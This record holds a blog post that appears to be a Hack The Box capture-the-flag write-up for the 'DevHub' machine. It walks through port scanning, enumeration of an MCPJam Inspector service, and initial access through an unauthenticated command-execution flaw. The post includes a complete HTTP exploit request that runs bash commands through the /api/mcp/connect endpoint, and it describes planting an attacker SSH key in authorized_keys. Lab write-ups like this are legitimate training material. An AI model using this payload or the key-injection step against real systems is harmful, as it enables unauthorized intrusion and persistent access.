{
"$type": "site.standard.document",
"bskyPostRef": {
"cid": "bafyreifpjlwewbqnzt7muizacmx3w4ia632hfmdowyeimnunq2lkitsmhy",
"uri": "at://did:plc:gc2nrf5j5b2po5huoyw6utr4/app.bsky.feed.post/3mni5tqqwy5q2"
},
"coverImage": {
"$type": "blob",
"ref": {
"$link": "bafkreie7bjymilfktcans4xygbcyt5vun2qc2qopzrkoeehicvoasvnzli"
},
"mimeType": "image/jpeg",
"size": 48077
},
"description": "HTB MACHINE: DEVHUB IP: Attacker IP: OS: Ubuntu 22.04.5 LTS Difficulty: Medium Category: Web / MCP Ecosystem / Lateral Movement RECONNAISSANCE PORT SCAN nmap -Pn -T4 -sV -p- --min-rate 2000 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.15 80/tcp open http nginx 1.18.0 (Ubuntu) 6274/tcp open http MCPJam Inspector (Node.js) Internal-only ports discovered later via process enumeration: 5000/t...",
"path": "/hack-the-box-htb-devhub-writeup-medium-weekly-may-31th-2026/",
"publishedAt": "2026-05-31T04:00:00.000Z",
"site": "https://1337sheets.com",
"tags": [],
"textContent": "# HTB Machine: DevHub\n\n**IP:** <TARGET_IP>\n**Attacker IP:** <ATTACKER_IP>\n**OS:** Ubuntu 22.04.5 LTS\n**Difficulty:** Medium\n**Category:** Web / MCP Ecosystem / Lateral Movement\n\n* * *\n\n## Reconnaissance\n\n### Port Scan\n\n```\nnmap -Pn -T4 -sV -p- --min-rate 2000 <TARGET_IP>\n```\n\n```\nPORT     STATE SERVICE VERSION\n22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.15\n80/tcp   open  http    nginx 1.18.0 (Ubuntu)\n6274/tcp open  http    MCPJam Inspector (Node.js)\n```\n\nInternal-only ports discovered later via process enumeration:\n\n```\n5000/tcp OPSMCP Flask server (127.0.0.1 only)\n8888/tcp JupyterLab (127.0.0.1 only)\n```\n\n### Web Enumeration — Port 80\n\nAdding `devhub.htb` to `/etc/hosts` and visiting port 80 reveals a static nginx landing page for **DevHub — Internal Development & Analytics Platform**. Three service cards are listed:\n\nService | Status | Notes\n---|---|---\nMCP Inspector | Active — Port 6274 | MCPJam Inspector\nAnalytics Dashboard | Internal Only — localhost:8888 | JupyterLab, runs as `analyst`\nCode Repository | Maintenance Mode | Internal Git\n\nThe Jupyter card explicitly states that access is restricted to the analyst team, an early signal that `analyst` is a meaningful user.\n\n### MCPJam Inspector — Port 6274\n\nBrowsing to `http://devhub.htb:6274/` loads the MCPJam Inspector UI. MCPJam is an open-source developer tool for connecting to, testing, and debugging MCP servers.\n\nAPI surface enumeration:\n\n```\ncurl -s http://<TARGET_IP>:6274/api/mcp/servers\n# {\"success\":true,\"servers\":[]}\n\ncurl -s -X POST http://<TARGET_IP>:6274/api/mcp/connect \\\n  -H 'Content-Type: application/json' -d '{}'\n# {\"success\":false,\"error\":\"...\"}\n```\n\nThe `/api/mcp/connect` endpoint accepts a `serverConfig` JSON body describing the MCP server the Inspector should launch or connect to. This is the attack surface.\n\n* * *\n\n## Initial Access — MCPJam Inspector RCE (CVE-2026-23744)\n\n### Vulnerability Analysis\n\nThe `POST /api/mcp/connect` endpoint allows a client to specify an MCP server to connect to. When the transport type is `stdio`, MCPJam spawns the given `command` with `args` as a subprocess and communicates with it over stdin/stdout using the MCP JSON-RPC protocol.\n\nThere is no authentication on this endpoint and no validation of the `command` field. Any OS binary can be specified, and it is executed as the user running the MCPJam process (`mcp-dev`).\n\n**Exploitation request:**\n\n```http\nPOST /api/mcp/connect HTTP/1.1\nHost: devhub.htb:6274\nContent-Type: application/json\nOrigin: http://localhost:6274\n\n{\n  \"serverId\": \"pwn\",\n  \"serverConfig\": {\n    \"type\": \"stdio\",\n    \"command\": \"bash\",\n    \"args\": [\"-c\", \"<OS COMMAND>\"],\n    \"env\": {\"PATH\": \"/usr/bin:/bin\"}\n  }\n}\n```\n\nThe response always reports `\"Connection closed\"` because bash exits after running the command (it never speaks the MCP protocol), but the command executes before bash terminates. The response looks the same whether the command succeeded or failed, so confirm execution out of band.\n\n**Outbound firewall note:** The target host firewall permits outbound HTTP (port 80) but blocks raw TCP reverse shells (`/dev/tcp`). This rules out traditional reverse shells. SSH key injection is used instead: the injected command appends an attacker public key to the `authorized_keys` file of `mcp-dev`, the user it runs as, which requires no outbound connection from the target, only the inbound SSH service on port 22 that the scan already showed open.",
"title": "Hack The Box - HTB DevHub Writeup - Medium - Weekly - May 31st, 2026",
"updatedAt": "2026-06-04T17:34:01.893Z"
}